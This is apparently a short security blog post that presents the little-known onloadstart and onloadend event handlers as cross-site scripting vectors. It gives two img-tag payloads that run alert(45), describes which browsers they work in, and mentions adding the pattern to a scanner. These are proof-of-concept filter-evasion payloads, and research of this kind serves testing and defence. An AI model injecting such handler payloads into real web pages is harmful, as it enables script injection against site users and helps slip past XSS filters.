onload*(start/end) event handler XSS(Any browser)

Hi hackers.
Last time I wrote about onpointer * xss, I write a not well-known event-handle for xss now.

onload* event handler for XSS

it’s onload* handler!
Handlers that usually start with onload are well known, but onloadstart and onloadend are not well known.

<!-- onloadstart -->
<!-- Any browser, but not use <img> tag.. -->
<img src="https://1.bp.blogspot.com/-VkTsdecsLiI/XQOmG8rqvyI/AAAAAAAAEPk/9XBkwoAfmXE1KSHlqwF5cROFfgxUtDF_gCLcBGAs/s640/hahwul.gif" onloadstart="alert(45)">

<!-- onloadend -->
<!-- only firefox -->
<img src="https://1.bp.blogspot.com/-VkTsdecsLiI/XQOmG8rqvyI/AAAAAAAAEPk/9XBkwoAfmXE1KSHlqwF5cROFfgxUtDF_gCLcBGAs/s640/hahwul.gif" onloadend="alert(45)">

onloadstar tested my site. it's work!

But, just only in Firefox.

for XSpear

add eventhandler pattern!

You're welcome
(img refer giphy.com)


Share: | Coffee Me: